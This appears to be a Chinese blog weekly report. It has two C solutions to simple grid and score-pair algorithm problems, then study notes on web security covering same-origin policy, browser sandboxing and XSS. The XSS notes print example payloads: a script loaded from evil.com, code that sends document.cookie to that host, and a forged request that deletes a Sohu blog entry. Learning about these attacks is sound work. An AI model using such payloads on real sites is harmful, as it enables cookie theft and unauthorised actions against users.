周报

C语言算法题

一个 n×nn\times nn×n 的网格图(标号由 111 开始)上有 mmm 个探测器,每个探测器有个探测半径 rrr ,问这 n×nn\times nn×n 个点中有多少个点能被探测到。
输入格式 第一行 333 个整数 n,m,rn,m,rn,m,r ;
接下来 mmm 行,每行两个整数 x,yx,yx,y
表示第 iii 个探测器的坐标。
输出格式 能被探测到的点的个数。
输入输出样例 输入 #1
复制
5 2 1
3 3
4 2 输出 #1
复制
8 说明/提示 1≤n,m≤1001\le n,m\le 1001≤n,m≤100

#include<stdio.h>
int main()
{
    int n,m,r,x[101],y[101],flag=0;
    scanf("%d%d%d",&n,&m,&r);
    for(int i=0;i<m;i++)
    {
        scanf("%d %d",&x[i],&y[i]);
    }
    for(int i=1;i<=n;i++)
    {
        for(int j=1;j<=n;j++)
        {
            for(int k=0;k<m;k++)
            {
                if(((x[k]-i)*(x[k]-i)+(y[k]-j)*(y[k]-j))<=r*r)
                {
                    flag++;
                    break;
                }
            }
        }
    }
    printf("%d",flag);
}

这个题,思路就比较暴力,因为,n的取值范围比较小,所以,直接暴力搜索,思路就一条,只要这个点到任意一个探测器的举例小于r计数器就加一。

现有 N(N≤1000)N(N\le 1000)N(N≤1000) 名同学参加了期末考试,并且获得了每名同学的信息:语文、数学、英语成绩(均为不超过 150 的自然数)。如果某对学生 <i,j> 的每一科成绩的分差都不大于 5,且总分分差不大于 10,那么这对学生就是“旗鼓相当的对手”。现在想知道这些同学中,有几对“旗鼓相当的对手”?同样一个人可能会和其他好几名同学结对。
输入格式 第一行一个正整数 NNN。
接下来 NNN 行,每行三个整数,其中第 iii 行表示第 iii 名同学的语文、数学、英语成绩。最先读入的同学编号为 1。
输出格式 输出一个个整数,表示“旗鼓相当的对手”的对数。
输入输出样例 输入 #1
复制
3
90 90 90
85 95 90
80 100 91

#include<stdio.h>
#include<math.h>
int main()
{
    int n,a[1001][3],count=0;
    scanf("%d",&n);
    for(int i=1;i<=n;i++)
    {
        scanf("%d%d%d",&a[i][0],&a[i][1],&a[i][2]);
    }
    for(int i=1;i<n;i++)
    {
        for(int j=i+1;j<=n;j++)
        {
            if(abs(a[i][0]-a[j][0])<=5&&abs(a[i][1]-a[j][1])<=5&&abs(a[i][2]-a[j][2])<=5&&abs(a[i][0]+a[i][1]+a[i][2]-a[j][0]-a[j][1]-a[j][2])<=10)
            count++;
        }
    }
    printf ("%d",count);
    return 0;
}

嗯。。。没啥说的,强行计算。

白帽子讲web安全

1.同源策略(Same Origin Policy)

浏览器的同源策略,限制了来自不同源的document或脚本,对当前document读取或设置某些属性,确保来自不同Origin的对象无法相互干扰。是浏览器安全的基础。
如JavaScript的同源策略:host,子域名,端口,协议完全相同才算同源。

a.标签
通过

b.XMLHttpRequest
可访问同源对象的内容,默认不能跨域,否则会导致敏感数据泄露,如Token。基于信任“JavaScript无法控制HTTP头”,目标域返回的HTTP可以授权是否允许XMLHttpRequest跨域访问。

c.Flash
网站提供crossdomain.xml文件判断当前源是否允许当前“源”的Flash跨域访问目标资源。Flash9 之后还实现MIME检查确认crossdomain.xml的合法性,以及crossdomain.xml是否在根目录下,防止攻击者上传crossdomain.xml文件绕过同源策略。

2.浏览器沙箱

Google Chrome是首个采取多进程架构的浏览器(浏览器进程,渲染进程,插件进程,扩展进程)。
多架构的好处:

1.安全性
渲染进程由Sandbox隔离,网页代码与浏览器内核、操作系统通信都要通过IPC Channel,其中会有一些安全检查。(将不可信任的代码隔离起来)
但加载的第三方插件不受Sandbox管辖,Flash、Java、PDF、.Net Framework都是浏览器攻击的热点。

2.稳定性
发生崩溃时只会影响一个Tab页,其他页面不受影响。

3.恶意网址拦截

恶意网址:

1.挂马。包含如JavaScript或Flash的恶意脚本,利用浏览器漏洞执行shellcode,向用户植入木马。
2.钓鱼。模仿知名网站的相似页面窃取信息。
拦截方法:
1.黑名单。 PhishTank、Google的SafeBrowsingAPI。
2.白名单。EVSSL证书,全球数字证书颁发机构和浏览器厂商一起打造的增强型证书。

xss攻击

Cookie劫持

先加载一个远程脚本

<script src=http://www.evil.com/evil.js></script>

在evil.js中,通过代码窃取Cookie
var img = document.createElement(“img”);

img.src=“http://www.evil.com/log?”+escape(document.cookie);

document.body.appendChild(img);

构造GET和POST请求

删除搜狐博客

var img = document.creatElement(“img”);

img.src=“http://blog.sohu.com/manage/entry.dom=delete&id=1556713012”;

document.body.appendChild(img);

XSS钓鱼

利用JavaScript在当前页面上“画出”一个伪造的登录框。

识别用户浏览器

alert(navigator.userAgent);

在IE中通过判断ActiveX控件的classid是否存在,来推测用户是否安装了该软件。
一些第三方软件也可能会泄露一些信息。比如Flash有一个system.capabilities对象,能够查询客户端电脑中的硬件信息。
浏览器的扩展和插件也能被XSS Payload扫描出来。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值